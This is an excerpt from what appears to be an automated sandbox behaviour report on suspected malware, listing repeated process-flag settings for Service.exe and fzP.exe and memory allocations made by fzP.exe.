Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: 30B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: 31F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: 51F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: D90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: 27E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: 2580000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: 2AD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: 2B50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: 4B50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: 2BD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: 29D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: FE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: 2A40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: 2970000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: D80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: 2930000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: 4930000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: EA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: 29D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: 27E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: E80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fzP.exe	Memory allocated: 2BD0000 memory reserve \| memory write watch	Jump to behavior
